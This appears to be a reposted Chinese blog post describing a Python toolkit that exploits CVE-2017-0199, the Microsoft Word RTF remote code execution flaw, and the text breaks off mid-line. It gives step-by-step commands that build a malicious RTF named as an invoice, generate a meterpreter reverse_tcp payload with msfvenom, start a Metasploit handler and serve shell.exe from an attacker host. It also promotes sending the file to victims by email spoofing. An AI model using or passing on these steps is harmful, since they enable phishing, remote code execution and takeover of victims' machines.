利用Python直接生成CVE-2017-0199漏洞测试脚本【转】

项目地址

https://github.com/bhdresh/CVE-2017-0199

CVE-2017-0199 – v2.0

CVE-2017-0199 – v2.0是一个比较方便测试CVE-2017-0199的python脚本，它提供了一种快速有效的方式来利用Microsoft RTF RCE。它可以生成恶意的RTF文件，并将metasploit/meterpreter有效载荷发送给受害者，而不需要任何复杂的配置。

版本：Python版本2.7.13

- Generate Malicious RTF file using toolkit- Run toolkit in an exploitation mode as tiny HTA + Web server

视频教程

https://youtu.be/42LjG7bAvpg

用法

工具包含以下功能

- Automatically send generated malicious RTF to victim using email spoofing

例：

• 步骤1：使用以下命令生成恶意RTF文件，并将其发送给受害者

 Syntax:
  # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
  Example:
  # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc

• 步骤2（可选，如果使用MSF的有效载荷）：生成metasploit payload并启动监听程序

 Example:

  Generate Payload:

  # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
  Start Handler:
  # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1

• 步骤3：在开发模式下启动工具包生成payload

 Syntax:
  # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
  Example:

  # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

命令行参数

# python cve-2017-0199_toolkit.py -hThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)Modes:-M gen                                          Generate Malicious RTF file only

     Generate malicious RTF file:

      -w <Filename.rtf>                   Name of malicious RTF file (Share this file with victim).

      -u <http://attacker.com/test.hta>   The path to an hta file. Normally, this should be a domain or IP where this tool is running.

                                             For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and

                                             will be requested once victim will open malicious RTF file.-M exp                                          Start exploitation mode

     Exploitation:

      -p <TCP port:Default 80>            Local port number.

      -e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.

      -l </tmp/shell.exe>                 Local path of an executable file / meterpreter shell / payload (If pay